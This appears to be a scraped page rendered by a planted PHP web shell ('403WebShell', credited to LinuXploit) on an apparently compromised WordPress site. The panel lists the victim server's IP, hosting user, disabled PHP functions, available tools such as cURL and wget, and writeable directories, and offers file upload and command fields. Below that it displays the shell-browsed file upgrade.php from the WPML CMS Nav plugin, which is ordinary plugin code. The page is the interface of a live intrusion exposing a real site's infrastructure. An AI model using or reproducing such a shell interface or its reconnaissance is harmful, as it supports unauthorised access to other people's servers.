$plugin = <<403WebShell
403Webshell
Server IP : 77.37.50.41  /  Your IP : 216.73.216.214
Web Server : LiteSpeed
System : Linux fr-int-web1513.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u766115111 ( 766115111)
PHP Version : 8.2.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u766115111/domains/vikory.com/public_html/wp-content/plugins/wpml-cms-nav/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u766115111/domains/vikory.com/public_html/wp-content/plugins/wpml-cms-nav/inc/upgrade.php
<?php
if ( ! defined( 'WPML_CMS_NAV_DEV_VERSION' ) && ( version_compare( get_option( 'WPML_CMS_NAV_VERSION' ), WPML_CMS_NAV_VERSION, '=' ) || ( isset( $_REQUEST['action'] ) && $_REQUEST['action'] == 'error_scrape' ) || ! isset( $wpdb ) ) ) {
	return;
}
add_action( 'plugins_loaded', 'wpml_cms_nav_upgrade', 1 );

function wpml_cms_nav_upgrade() {
	$previous_version = get_option( 'WPML_CMS_NAV_VERSION' );

	// Forcing upgrade logic when WPML_CMS_NAV_DEV_VERSION is defined
	// This allow to run the logic between different alpha/beta/RC versions
	// since we are now storing only the formal version in the options
	if ( defined( 'WPML_CMS_NAV_DEV_VERSION' ) ) {
		wpml_cms_nav_upgrade_version( WPML_CMS_NAV_VERSION, true );
	}

	if ( version_compare( $previous_version, WPML_CMS_NAV_VERSION, '<' ) ) {
		update_option( 'WPML_CMS_NAV_VERSION', WPML_CMS_NAV_VERSION );
	}
}

function wpml_cms_nav_upgrade_version( $version, $force = false ) {
	$previous_version = get_option( 'WPML_CMS_NAV_VERSION' );

	if ( $force || ( $previous_version && version_compare( $previous_version, $version, '<' ) ) ) {
		$upg_file = WPML_CMS_NAV_PLUGIN_PATH . '/inc/upgrade-functions/upgrade-' . $version . '.php';
		if ( file_exists( $upg_file ) && is_readable( $upg_file ) ) {
			if ( ! defined( 'WPML_DOING_UPGRADE' ) ) {
				define( 'WPML_DOING_UPGRADE', true );
			}
			/** @noinspection PhpIncludeInspection */
			include_once $upg_file;
		}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit